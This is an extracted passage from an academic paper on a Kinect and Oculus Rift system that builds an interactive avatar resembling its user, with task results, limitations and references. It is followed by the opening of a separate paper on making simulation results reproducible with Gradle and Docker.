Kinect sensor is recognized as an user (up to six) and the software offers the option of which user is on first-person mode. This choice is made with the number keys in the keyboard starting from 1 up to 6. The ‘‘0’’ key serves as a reset mode, detaching the field of view from the last chosen user. Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 12/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.128 Figure 5 Avatar visualization with polygon surface. Similarly to Fig. 4 we see both left and right frames projected through the Oculus Rift’s lenses. In this case, the avatar has a continuous surface, except for its borders and generated artifacts on the base. The red dots that represent Kinect joints can still be noticed behind the avatar and its right index finger. Physical collisions with the Avatar One of the keystones for an immersive virtual reality experience is interactivity. In this approach, we used the Bullet physics engine in order to recreate a desired physical interaction simulation between the avatar and an arbitrary virtual object. A green solid rectangular block was created in the virtual environment and placed within the reach of the user’s avatar. Figure 6 represents the moment when the user tries to balance the green block with their own hands, preventing it from falling. In the code, the programmer can add more objects to the simulation using the Bullet physics engine. In our approach, each joint vertex provided by the Kinect becomes a bullet static object. It is possible to visualize a general distribution of joints along the body in Fig. 4, where each red dot is a joint. Therefore, each red dot can collide with virtual elements, considering the fact that the dot itself does not suffer any consequence from the collision because its location depends only on the data from the Kinect. In Fig. 6, the red dots are the contact points between the avatar’s hands and the green block and are responsible for pushing and moving the object at any condition. Avatar interaction with the VR world Avatar interaction with the VR world was assessed with three tasks. In the first task, the block tracking task, both naive and experienced users succeeded in following the sinusoidal block motion (Figs. 7A and 7C). Note the high resemblance between block and user trajectories in the X direction (R2=0.99), whilst the Y and Z directions present a more divergent motion. We proceeded by investigating the user ability in handling a virtual object. Figures 7B and 7D show the results for the block jiggling task. Both naive and experienced users were Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 13/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.128 Figure 6 Physics interaction with green block. This figure shows the first-person perspective while the avatar interacts with a green block. The avatar is reaching for the green block in order to interact with it. Although the hands are graphically displayed, only the red dots can contact the green block. able to manipulate the object, but the latter was significantly better (95% confidence, as indicated by the non-overlapping boxplot notches) at preventing the block from falling. Lastly, in the third task (Figs. 3 and 8), we investigated the tracking performance and analyzed possible mismatches between the real and VR worlds by comparing the Oculus plus Kinect system with a precision motion capture device (OptiTrack). As the participant moves their hand from one side of the table toward the black block, both systems successfully capture the trajectory, as displayed in Fig. 8A. Note that the OptiTrack trajectories are smoother than the Oculus plus Kinect trajectories, which is expected given the OptiTrack tracking method (infrared) and superior frame rate (120 frames/s). The moment both systems detect that the participant has reached the block has a difference of ≈30 ms (Fig. 8A, inset panel). Regarding the Oculus plus Kinect system frame rate over the course of the task, we observe from Fig. 8B that it has an average value of≈44 frames/s; the minimum value was 35 frames/s. Note that the Kinect has a frame rate of 30 frames/s, thus there may be a mismatch between the Kinect and the Oculus data. Nevertheless, the results from the three tasks above indicate that this does not compromise the user experience. Taken together, our results indicate that the method suggested in this paper provides a real time immersive experience interaction. DISCUSSION An approach for creating a real-time responsive and user-resembling avatar This work presents a structured method for integrating both hardware and software elements in order to conceive an avatar visualization that is responsive to user movements Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 14/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.128 Figure 7 Avatar interaction with virtual world. (A) Block tracking task. With their hand, the user has to follow a red block as it performs a 1D sinusoidal trajectory (left to right panels). (B) Block jiggling task. Using both hands, the user has to jiggle a parallelepiped-shaped green block from left to right whilst en- suring that it does not fall. (C) Representative 2,000 iterations of block and user trajectories for X–Y –Z coordinates. Note that the block sinusoidal trajectory occurs only in the X coordinate. (D) Distribution of successful trials (number of successive left to right block jiggles with no falls in n=43 attempts) for a naive and experienced user. and can interact with virtual objects. The implementation includes features such as first and third person perspective, the choice of which user is the main point of view, and also the possibility to adjust the point of view, as in farther or closer to the central head position, for example. The method was developed in order to increase the immersion experience in VR systems, focusing on avatar resemblance with the user and the interaction with the virtual environment. Considering the three levels of self representation presented by De França & Soares (2015), the system exploit mostly the body and identity levels. On one hand, the creation of the avatar assumes a body position and shape that is intrinsically connected with the Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 15/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.128 Figure 8 Comparison between the Oculus plus Kinect and OptiTrack systems. (A) Five representa- tive trials of hand trajectories (represented as hand distance from block over time) for each system. Each trial has a duration of 1.5–2 s. Blue and red color scale (lighter to darker) relate to respective trial number. The inset panel shows the time difference (1t) between both systems in detecting that the block has been reached. (B) Oculus plus Kinect system frame rate over the duration of the task (120 s). user to create a self representation. On the other hand, the identity level is supported by a feature that recreates the avatar from real time user data, allowing them to see their own shapes and clothes in real time. Also, the possibility to interact with objects allows the user to sense the limits between their virtual selves and the virtual environment, creating avatar identity. The last level of self-representation, affection, is not directly addressed by the system, as we do not shape or modify the avatar to increase affection. Yet it emerges from the affection the user has for their own virtual representation, since it resembles closely their real body shape. Therefore, the system presents a good combination of all the three levels, which impacts on immersion and sense of embodiment. Exploring three different tasks, we were able to assess the system performance with respect to the immersion and interactivity requirements. In the first task (Fig. 7), the block tracking task, both naive and experienced users were able to follow the sinusoidal path performed by the block. This indicates that the avatar is easily incorporated by the user and its interaction with elements from the VR world are coherently coupled with actions in the real world. This fact is reinforced by the second task, in which users manipulate a virtual object. The Oculus plus Kinect system is capable of creating an avatar that is responsive to users actions whilst the collision detection module provides a realistic sense of interaction with the real world. The statistically significantly difference in performance between naive and experienced VR users in a relatively easy manual coordination task stresses that the interaction with virtual objects can improve with practice. Also, incorporating a haptic feedback system may improve user experience in the virtual world (Lecuyer et al., 2004; Otaduy, Okamura & Subramanian, 2016). Finally, in the third task (Fig. 8), results indicate that the mismatch between the virtual world and real world actions is kept to a minimum and does not compromise the user immersion experience. Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 16/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.128 Limitations and further improvements Point cloud visualization and program parallelization The core concept in this implementation involves the visualization of a point cloud. This visualization can be either as points floating in the virtual space for each data point in the point cloud or a surface recreation from the point cloud data. As a result, the quality of the avatar graphical visualization is inherently dependent on the point cloud data quality. The point cloud data provided by the Kinect is noisy, as seen in Fig. 6. The implementation for the avatar visualization, in this work, sends all kinect point data to the OpenGL library, without performing any analysis or filtering. The result is an avatar visualization that is easily recognizable as the current user, but presents noisy and undefined borders. A first improvement over this method would be to implement a data filter to exclude points from the visualization that goes beyond a predefined body contour. A first method shown in Point Cloud Library (2011) involves trimming points that are located further than a specified threshold, the interval between the mean and the standard deviation of the global distance, according to a Gaussian distribution of the distance. Other methods (Schall, Belyaev & Seidel, 2005) involve heavy calculations and, although they might produce a better result, the filtered point cloud may not significantly improve visualization. The point cloud itself imposes another problem that affects the speed of the system. During the rendering cycle, after the data is acquired from the Kinect, the system has to convert all the data points from the depth space to the camera space (i.e., the real world 3D dimensions), this processing is made in the CPU because it uses Kinect specific functions and this limits the processing throughput according to the number of cores the CPU has. In addition, there are several methods to create a surface from the point cloud. The method used to create Fig. 5 consists of connecting the camera space points in groups of three, considering the 2D matrix from which they were acquired, and rendering a triangle with OpenGL. However, using the polygon rendering mode with OpenMP may cause the program to suffer a severe drop on rendered frames per second, thus further work should explore this issue. When creating a smooth surface from the point cloud, it is important to observe how the method will affect frames throughput on OpenGL engine. An optimal implementation would seek to parallelize this process within the graphics processing unit (GPU). The implementation of a point cloud triangulation algorithm such as presented in Scheidegger, Fleishman & Silva (2005) would have to be tested for real time applications. Integration with eye and gaze tracking technologies One of the key factors for immersion, as mentioned by Alshaer, Regenbrecht & O’Hare (2017), is the Field of View (FOV). In general, FOV or visual field is the area of space within which an individual can detect the presence of visual stimulus (Dagnelie, 2011). For VR, one might assume that matching the FOV of VR headsets with that of our own eyes would be ideal, but that is not necessarily the case. A widening of the field of view is beneficial to the immersion factor as stated by Prothero & Hoffman (1995) and Alshaer, Regenbrecht & O’Hare (2017). Nowadays, most VR headsets have a field of view of about 110 vertical degrees (DigitalTrends, 2017), whereas the field of Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 17/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.128 view of the human eye with binocular view is about 135 vertical degrees. However, there are other factors such Depth-of-Field (DoF) Blur that affect the perception of field of view. Hillaire et al. (2008) mention that technologies such as eye and gaze tracking can be used to improve the Depth-of-Field Blur, considering that DoF simulates the fact that humans perceive sharp objects only within some range of distance around the focal distance, and thus humans do not use the whole FOV at the same time. Hillaire et al. (2008) concluded that eye and gaze tracking technologies could be used to exploit visual effects that depend on the user’s focal point, aiming to increase usage comfort and immersion within VR systems. Nowadays, there are a few options that implement eye tracking capabilities in HMDs. The first one is Tobii Eye Tracking, which tries to perform custom adaptations to link an existing eye tracking device to a HMD. The second and most promising option would be the FOVE VR Headset, which implements the integration of HMD and eye tracking in the system as a whole. However, FOVE is currently open for pre-orders only and software development for this device is still in its initial steps. Alternative approach for an improved physical simulation In its current version, each detected skeleton joint from the Kinect becomes a small sphere for physical simulation within the Bullet Engine. As a result, only a few predetermined points are able to interact with the virtual objects in the simulated environment. This implementation renders a realistic physical simulation when the user pushes a virtual object, but performance deteriorates when the user tries to hold objects, specially the small ones. This happens because the Kinect provides only three skeleton joints for the hand, which is not enough for a realistic approximation for hand interaction in some situations. This limitation is extended for the whole body for different interactions, when the number of points does not allow for a realistic approximation for body interactions. An improvement over this implementation would be to use a greater number of points for approximating body interactions. In this approach, a much greater number of points from the point cloud would become spherical rigid bodies in the Bullet engine instead of limited skeleton joints. In this way, there would be a better sense of interaction with the body surface because the gap between contact points would decrease and improve the perception of continuity. Using a greater number of points is a reasonable alternative given that the Bullet Engine does not officially allow for kinematic surfaces in its current implementation, which discourages developing physical interactions with an actual surface obtained from the point cloud. However, as the number of rigid bodies in the simulation increases the Bullet Simulation slows down, which would affect the number of frames the application could provide for the Oculus Rift. A possible solution for this problem is in experimental stage and will be available in future versions of the Bullet Engine. The Bullet Engine developers are using OpenCL to parallelize simulation in the GPU and, as a result, the engine can handle real time simulation of thousands of objects simultaneously (Harada, 2011). This alternative solution for physical interaction could improve the level of realism the software provides, specially the finesse with which each touch is calculated. The user would be able to handle objects with their fingers, for example, depending on how many points Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 18/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.128 from the point cloud are used, and whole-body interactions would be better illustrated for the body surface, instead of the body joint approximation. Interfacing with other platforms In the last few years, virtual reality has become much more accessible. The Oculus Rift and the Kinect were surely promoters of this revolution by taking really expensive hardware used for scientific research and reshaping it to the consumer price level. Yet this revolution continues within the realm of mobile platforms, spreading even more the virtual reality concept to the masses. The Google Cardboard is a good example. For a reduced price, one can buy or build a head mounted display that uses their own smartphone as a display for a virtual reality environment. In order to use the present system in a mobile setting, we have to consider how the system is organized and how the interface with each device works. If it were to substitute the Oculus Rift for a smartphone-based HDM, there is still the need to use the Kinect to create the avatar representation. However, building an interface to connect the Kinect directly with a mobile platform is challenging. A possible solution to this problem is to implement a webservice whose main task would be to pipe pre-processed Kinect frame data to the smartphone. In this architecture, the bulk of processing, which is converting depth points to 3D space, would be done in the desktop computer and a portable graphics rendering solution such as OpenGL ES would be able to use this data to create the virtual environment similarly to what happens in the Oculus Rift. A similar project was developed by Peek (2017), in which he can send depth and skeleton data to a Windows Phone. CONCLUSION VR systems are constantly improving, yet they still lack a few features that could enhance user experience. The immersion factor is crucial for user engagement, allowing for life-like psychological and physical user responses and scientific experiments. There are still a few elements that influence the immersion experience. The avatar is one of them and, aligned with Wrzesien et al. (2015), who showed that appearance resemblance with the user creates a stronger set of emotional responses, avatars that recreate user features will probably provide an improved virtual reality immersion. This work aimed to create a user avatar with currently available commercial technology. We used Kinect and Oculus Rift for this purpose. The former is responsible for acquiring color, depth and movement data from the environment, which allows the latter to visually recreate an avatar representation of the user. Together with a physics engine, we provide avatar interactions with objects in the virtual environment. The method presented in this work lies within the realm of VR applications, specially those which require avatar representation and physical interactions with the virtual environment. The hardware and software approach we used is expandable to other systems. It is innovative in the way it binds the hardware and software capabilities by integrating the virtual environment with skeleton tracking, body detection, and object collisions in order to create a unique, user-resembling and interactive avatar. All of these features together appeal to the final user and contribute to an immersive interaction with virtual reality. Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 19/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.128 ACKNOWLEDGEMENTS We acknowledge the support from the staff and students from the Edmond e Lily Safra International Institute of Neuroscience. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the Brazilian Financing Agency for Studies and Projects (FINEP), the Brazilian Ministry of Science, Technology and Innovation (MCTI), the National Institute of Science and Technology (INCT) Brain Machine-Interface (INCEMAQ/MCTI/CNPq/CAPES/FAPERN), and the Ministry of Education (MEC). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Brazilian Financing Agency for Studies and Projects (FINEP). Brazilian Ministry of Science, Technology and Innovation (MCTI). National Institute of Science and Technology (INCT). Brain Machine-Interface (INCEMAQ/MCTI/CNPq/CAPES/FAPERN). Ministry of Education (MEC). Competing Interests The authors declare there are no competing interests. Author Contributions • Igor Macedo Silva conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Renan C. Moioli conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. Ethics The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): The Brazilian National Committee of Ethics in Research (Comissão Nacional de Ética em Pesquisa - CONEP) granted Ethical approval for the Santos Dumont Institute to carry out the study within its facilities (Ethical Application Ref: 1.610.260). Data Availability The following information was supplied regarding data availability: GitHub: https://github.com/igormacedo/liveinteractiveavatar. Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 20/24 https://peerj.com https://github.com/igormacedo/liveinteractiveavatar http://dx.doi.org/10.7717/peerj-cs.128 Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.128#supplemental-information. REFERENCES Abulrub AG, Attridge A, Williams MA. 2011. Virtual reality in engineering education: the future of creative learning. International Journal of Emerging Technologies in Learning 6(4):4–11 DOI 10.3991/ijet.v6i4.1766. Alshaer A, Regenbrecht H, O’Hare D. 2017. Immersion factors affecting perception and behaviour in a virtual reality power wheelchair simulator. Applied Ergonomics 58:1–12 DOI 10.1016/j.apergo.2016.05.003. ASUS. 2017. Xtion PRO LIVE. Available at https://www.asus.com/us/3D-Sensor/Xtion_ PRO_LIVE/specifications/ (accessed on 06 June 2017). Baldominos A, Saez Y, Del Pozo CG. 2015. An approach to physical rehabilitation using state-of-the-art virtual reality and motion tracking technologies. Procedia Computer Science 64(December):10–16 DOI 10.1016/j.procs.2015.08.457. Clark RA, Pua YH, Fortin K, Ritchie C, Webster KE, Denehy L, Bryant AL. 2012. Validity of the Microsoft Kinect for assessment of postural control. Gait and Posture 36(3):372–377 DOI 10.1016/j.gaitpost.2012.03.033. Clark RA, Pua Y-H, Oliveira CC, Bower KJ, Thilarajah S, Mcgaw R, Hasanki K, Men- tiplay BF. 2015. Gait & posture reliability and concurrent validity of the Microsoft Xbox One Kinect for assessment of standing balance and postural control. Gait & Posture 42(2):210–213 DOI 10.1016/j.gaitpost.2015.03.005. Coumans E. 2015. Bullet 2.83 physics SDK manual. Available at http://bulletphysics.org. Cuperus AA, Laken M, Van Den Hout MA, Engelhard IM. 2016. Degrading emotional memories induced by a virtual reality paradigm. Journal of Behavior Therapy and Experimental Psychiatry 52:45–50 DOI 10.1016/j.jbtep.2016.03.004. Dagnelie G (ed.) 2011. Visual prosthetics: physiology, bioengineering, rehabilitation. New York: Springer. De França ACP, Soares MM. 2015. Dialogical self on virtual reality systems: pres- ence and embodiment in human situated interaction. Procedia Manufacturing 3(Ahfe):6444–6450 DOI 10.1016/j.promfg.2015.07.923. DepthSense. 2017. DepthSense cameras. Available at https://www.softkinetic.com/ products/depthsensecameras (accessed on 06 June 2017). Didehbani N, Allen T, Kandalaft M, Krawczyk D, Chapman S. 2016. Virtual reality social cognition training for children with high functioning autism. Computers in Human Behavior 62:703–711 DOI 10.1016/j.chb.2016.04.033. DigitalTrends. 2017. Spec comparison: does the Rift’s touch update make it a true Vive competitor? Available at https://www.digitaltrends.com/virtual-reality/oculus-rift-vs- htc-vive/ (accessed on 06 June 2017). Donati ARC, Shokur S, Morya E, Campos D. SF, Moioli RC, Gitti CM, Augusto PB, Tripodi S, Pires CG, Pereira GA, Brasil FL, Gallo S, Lin AA, Takigami AK, Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 21/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.128#supplemental-information http://dx.doi.org/10.7717/peerj-cs.128#supplemental-information http://dx.doi.org/10.3991/ijet.v6i4.1766 http://dx.doi.org/10.1016/j.apergo.2016.05.003 https://www.asus.com/us/3D-Sensor/Xtion_PRO_LIVE/specifications/ https://www.asus.com/us/3D-Sensor/Xtion_PRO_LIVE/specifications/ http://dx.doi.org/10.1016/j.procs.2015.08.457 http://dx.doi.org/10.1016/j.gaitpost.2012.03.033 http://dx.doi.org/10.1016/j.gaitpost.2015.03.005 http://bulletphysics.org http://dx.doi.org/10.1016/j.jbtep.2016.03.004 http://dx.doi.org/10.1016/j.promfg.2015.07.923 https://www.softkinetic.com/products/depthsensecameras https://www.softkinetic.com/products/depthsensecameras http://dx.doi.org/10.1016/j.chb.2016.04.033 https://www.digitaltrends.com/virtual-reality/oculus-rift-vs-htc-vive/ https://www.digitaltrends.com/virtual-reality/oculus-rift-vs-htc-vive/ http://dx.doi.org/10.7717/peerj-cs.128 Aratanha MA, Joshi S, Bleuler H, Cheng G, Rudolph A, Nicolelis MAL. 2016. Long-term training with a brain-machine interface-based gait protocol induces partial neurological recovery in paraplegic patients. Scientific Reports 6(April):30383 DOI 10.1038/srep30383. Draganov IR, Boumbarov OL. 2015. Investigating oculus rift virtual reality display applicability to medical assistive system for motor disabled patients. In: 2015 IEEE 8th international conference on intelligent data acquisition and advanced computing systems: technology and applications (IDAACS). Vol. 2. Piscataway: IEEE, 751–754 DOI 10.1109/IDAACS.2015.7341403. Fox J, Bailenson JN. 2009. Virtual self-modeling: the effects of vicarious reinforce- ment and identification on exercise behaviors. Media Psychology 12(1):1–25 DOI 10.1080/15213260802669474. Gonzalez-Jorge H, Riveiro B, Vazquez-Fernandez E, Martínez-Sánchez J, Arias P. 2013. Metrological evaluation of microsoft kinect and Asus Xtion sensors. Measurement 46(6):1800–1806 DOI 10.1016/j.measurement.2013.01.011. Harada T. 2011. A parallel constraint solver for a rigid body simulation. In: SIGGRAPH Asia 2011 Sketches on–SA ’11. New York: ACM Press, 1. Hillaire S, Lecuyer A, Cozot R, Casiez G. 2008. Using an eye-tracking system to improve camera motions and depth-of-field blur effects in virtual envi- ronments. In: 2008 IEEE virtual reality conference. Piscataway: IEEE, 47–50 DOI 10.1109/VR.2008.4480749. LeapMotion. 2017. Leap Motion API overview. Available at https://developer.leapmotion. com/documentation/csharp/devguide/Leap_Overview.html (accessed on 06 June 2017). Lecuyer A, Vidal M, Joly O, Megard C, Berthoz A. 2004. Can haptic feedback improve the perception of self-motion in virtual reality? In: Proceedings of the 12th interna- tional symposium on haptic interfaces for virtual environment and teleoperator systems, 2004 (HAPTICS’04). 208–215 DOI 10.1109/HAPTIC.2004.1287198. Linsen L. 2001. Point cloud representation. Technical report 2001–3. Fakultät f’’ur Informatik, Universität Karlsruhe (TH). Lugrin JL, Landeck M, Latoschik ME. 2015. Avatar embodiment realism and virtual fitness training. In: Proceedings of the 2015 IEEE virtual reality conference. Piscataway: IEEE, 225–226 DOI 10.1109/VR.2015.7223377. Luigi M, Massimiliano M, Aniello P, Gennaro R, Virginia PR. 2015. On the validity of immersive virtual reality as tool for multisensory evaluation of urban spaces. Energy Procedia 78:471–476 DOI 10.1016/j.egypro.2015.11.703. Microsoft. 2017a. MS Kinect v1 technical specifications. Available at https://msdn. microsoft.com/en-us/library/jj131033.aspx (accessed on 29 May 2017). Microsoft. 2017b. MS Kinect v2 technical specifications. Available at https://developer. microsoft.com/en-us/windows/kinect/hardware (accessed on 29 May 2017). Mills S. 1996. Virtual reality—user issues. In: IEE colloquium on virtual reality—user issues. London: IEE, 1–1 DOI 10.1049/ic:19960451. Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 22/24 https://peerj.com http://dx.doi.org/10.1038/srep30383 http://dx.doi.org/10.1109/IDAACS.2015.7341403 http://dx.doi.org/10.1080/15213260802669474 http://dx.doi.org/10.1016/j.measurement.2013.01.011 http://dx.doi.org/10.1109/VR.2008.4480749 https://developer.leapmotion.com/documentation/csharp/devguide/Leap_Overview.html https://developer.leapmotion.com/documentation/csharp/devguide/Leap_Overview.html http://dx.doi.org/10.1109/HAPTIC.2004.1287198 http://dx.doi.org/10.1109/VR.2015.7223377 http://dx.doi.org/10.1016/j.egypro.2015.11.703 https://msdn.microsoft.com/en-us/library/jj131033.aspx https://msdn.microsoft.com/en-us/library/jj131033.aspx https://developer.microsoft.com/en-us/windows/kinect/hardware https://developer.microsoft.com/en-us/windows/kinect/hardware http://dx.doi.org/10.1049/ic:19960451 http://dx.doi.org/10.7717/peerj-cs.128 Morel M, Bideau B, Lardy J, Kulpa R. 2015. Advantages and limitations of virtual reality for balance assessment and rehabilitation. Clinical Neurophysiology 45(4–5):315–326 DOI 10.1016/j.neucli.2015.09.007. Notzon S, Deppermann S, Fallgatter A, Diemer J, Kroczek A, Domschke K, Zwanzger P, Ehlis AC. 2015. Psychophysiological effects of an iTBS modulated virtual reality challenge including participants with spider phobia. Biological Psychology 112:66–76 DOI 10.1016/j.biopsycho.2015.10.003. Otaduy MA, Okamura A, Subramanian S. 2016. Haptic technologies for direct touch in virtual reality. In: ACM SIGGRAPH 2016 Courses, SIGGRAPH’16. New York: ACM, 13:1–13:123. Otte K, Kayser B, Mansow-Model S, Verrel J, Paul F, Brandt AU, Schmitz-Hubsch T. 2016. Accuracy and reliability of the kinect version 2 for clinical measurement of motor function. PLOS ONE 11(11):1–17 DOI 10.1371/journal.pone.0166532. Paolini G, Peruzzi A, Mirelman A, Cereatti A, Gaukrodger S, Hausdorff J, Della Croce U. 2013. Validation of a method for real time foot position and orientation tracking with microsoft kinect technology for use in virtual reality and treadmill based gait training programs. IEEE Transactions on Neural Systems and Rehabilitation Engineering 22(c):997–1002. Park SY, Kim SM, Roh S, Soh M-A, Lee SH, Kim H, Lee YS, Han DH. 2016. The effects of a virtual reality treatment program for online gaming addiction. Computer Methods and Programs in Biomedicine 129:1–10 DOI 10.1016/j.cmpb.2016.01.015. Peek B. 2017. Connecting to the Kinect remotely with the Kinect Service. Available at https://channel9.msdn.com/coding4fun/kinect/Connecting-to-the-Kinect-remotely- with-the-Kinect-Service (accessed on 07 June 2017). Playstation VR. 2017. PS VR in detail Technical specifications. Available at https://www. playstation.com/en-au/explore/playstation-vr/tech-specs/ (accessed on 06 June 2017). Point Cloud Library. 2011. Removing outliers using a StatisticalOutlierRemoval filter. Available at http://pointclouds.org/documentation/tutorials/statistical_outlier.php (accessed on 16 September 2016). Portman ME, Natapov A, Fisher-Gewirtzman D. 2015. To go where no man has gone before: virtual reality in architecture, landscape architecture and envi- ronmental planning. Computers, Environment and Urban Systems 54:376–384 DOI 10.1016/j.compenvurbsys.2015.05.001. Prothero J, Hoffman H. 1995. Widening the field of view increases the sense of presence within immersive virtual environments. Human Interface Technology Laboratory Tech. Rep. University of Washington. Remondino F. 2003. From point cloud to surface: the modeling and visualization problem. International Archives of Photogrammetry, Remote Sensing and Spatial Information Sciences XXXIV:24–28. Rudinskiy M, Bula M, Stahl T, Davies N, Fitzgerald M, D’Andrea S, Gielo-Perczak K. 2014. Dual actuated gait rehabilitation treadmill implementing virtual reality and visual postural feedback. In: 2014 40th annual northeast bioengineering conference (NEBEC). Piscataway: IEEE, 1–2. Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 23/24 https://peerj.com http://dx.doi.org/10.1016/j.neucli.2015.09.007 http://dx.doi.org/10.1016/j.biopsycho.2015.10.003 http://dx.doi.org/10.1371/journal.pone.0166532 http://dx.doi.org/10.1016/j.cmpb.2016.01.015 https://channel9.msdn.com/coding4fun/kinect/Connecting-to-the-Kinect-remotely-with-the-Kinect-Service https://channel9.msdn.com/coding4fun/kinect/Connecting-to-the-Kinect-remotely-with-the-Kinect-Service https://www.playstation.com/en-au/explore/playstation-vr/tech-specs/ https://www.playstation.com/en-au/explore/playstation-vr/tech-specs/ http://pointclouds.org/documentation/tutorials/statistical_outlier.php http://dx.doi.org/10.1016/j.compenvurbsys.2015.05.001 http://dx.doi.org/10.7717/peerj-cs.128 Rusu RB, Cousins S. 2011. 3d is here: point cloud library (pcl). In: Robotics and automa- tion (ICRA), 2011 IEEE international conference on. Piscataway: IEEE, 1–4. Schall O, Belyaev A, Seidel H-P. 2005. Robust filtering of noisy scattered point data. In: Proceedings eurographics/IEEE VGTC symposium point-based graphics, 2005. Piscataway: IEEE. Scheidegger CE, Fleishman S, Silva CT. 2005. Triangulating point set surfaces with bounded error. In: Desbru M, Pottmann H, eds. Eurographics symposium on geometry processing 2005. The Eurographics Association. Shokur S, Gallo S, Moioli RC, Donati A. RC, Morya E, Bleuler H, Nicolelis M. AL. 2016. Assimilation of virtual legs and perception of floor texture by complete paraplegic patients receiving artificial tactile feedback. Scientific Reports 6:Article 32293 DOI 10.1038/srep32293. Stavroulia KE, Ruiz-Harisiou A, Manouchou E, Georgiou K, Sella F, Lanitis A. 2016. A 3D virtual environment for training teachers to identify bullying. In: Proceedings of the 18th Mediterranean electrotechnical conference: intelligent and efficient technologies and services for the citizen, MELECON 2016, April. 18–20. Weichert F, Bachmann D, Rudak B, Fisseler D. 2013. Analysis of the accuracy and robustness of the Leap Motion Controller. Sensors 13(5):6380–6393 DOI 10.3390/s130506380. Woodard W, Sukittanon S. 2015. Interactive virtual building walkthrough using Oculus Rift and Microsoft Kinect. In: SoutheastCon 2015. Piscataway: IEEE, 1–3. Wrzesien M, Rodríguez A, Rey B, Alcañiz M, Baños RM, Vara MD. 2015. How the physical similarity of avatars can influence the learning of emotion reg- ulation strategies in teenagers. Computers in Human Behavior 43:101–111 DOI 10.1016/j.chb.2014.09.024. Zhao W, Espy DD, Reinthal MA, Feng H. 2014. A feasibility study of using a single Kinect sensor for rehabilitation exercises monitoring: a rule based approach. In: 2014 IEEE symposium on computational intelligence in healthcare and e-health (CICARE). Piscataway: IEEE, 1–8. Zheng J, Chan K, Gibson I. 1998. Virtual reality. IEEE Potentials 17(2):20–23 DOI 10.1109/45.666641. Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 24/24 https://peerj.com http://dx.doi.org/10.1038/srep32293 http://dx.doi.org/10.3390/s130506380 http://dx.doi.org/10.1016/j.chb.2014.09.024 http://dx.doi.org/10.1109/45.666641 http://dx.doi.org/10.7717/peerj-cs.128 work_qxcof3it6vhyxbcv4b7vyzzs4m ---- Making simulation results reproducible-Survey, guidelines, and examples based on Gradle and Docker Making simulation results reproducible— Survey, guidelines, and examples based on Gradle and Docker Wilfried Elmenreich, Philipp Moll, Sebastian Theuermann and Mathias Lux Universität Klagenfurt, Klagenfurt, Austria ABSTRACT This article addresses two research questions related to reproducibility within the context of research related to computer science. First, a survey on reproducibility addressed to researchers in the academic and private sectors is described and evaluated. The survey indicates a strong need for open and easily accessible results, in particular, reproducing an experiment should not require too much effort. The results of the survey are then used to formulate guidelines for making research results reproducible. In addition, this article explores four approaches based on software tools that could bring forward reproducibility in research results. After a general analysis of tools, three examples are further investigated based on actual research projects which are used to evaluate previously introduced tools. Results indicate that the evaluated tools contribute well to making simulation results reproducible but due to conflicting requirements, none of the presented solutions fulfills all intended goals perfectly. Subjects Data Science, Scientific Computing and Simulation, Software Engineering Keywords In-silico research, Reproducibility, Simulation INTRODUCTION Reproducibility of experimental results is fundamental in all scientific disciplines. Reproducing results of published experiments, however, is often a cumbersome and unrewarding task. Casadevall & Fang (2010) report that some fields, for example biology, are concerned with complex and chaotic systems which are difficult to reproduce. At the same time, we would expect digital software-based experiments to be easily reproducible, because digital data can be easily provided and computer algorithms on these data are typically well-described and deterministic. However, this is often not the case due to a lack of disclosure of relevant software and data that would be necessary to reproduce results. Ongoing open science initiatives aim to have researchers provide access to data and software together with their publications in order to allow reviewers to make well-informed decisions and to provide other researchers with the information and necessary means to build upon and extend original research (Ram, 2013). This article addresses two research questions (RQ) related to reproducibility: RQ1 “To what extent is reproducibility of results based on software artifacts important in the field of computer science and in related research areas?” RQ2 “What tools can be used to support reproducibility?” How to cite this article Elmenreich W, Moll P, Theuermann S, Lux M. 2019. Making simulation results reproducible—Survey, guidelines, and examples based on Gradle and Docker. PeerJ Comput. Sci. 5:e240 DOI 10.7717/peerj-cs.240 Submitted 9 June 2019 Accepted 1 November 2019 Published 9 December 2019 Corresponding author Wilfried Elmenreich, wilfried.elmenreich@aau.at Academic editor Philipp Leitner Additional Information and Declarations can be found on page 25 DOI 10.7717/peerj-cs.240 Copyright 2019 Elmenreich et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.240 mailto:wilfried.�elmenreich@�aau.�at https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ 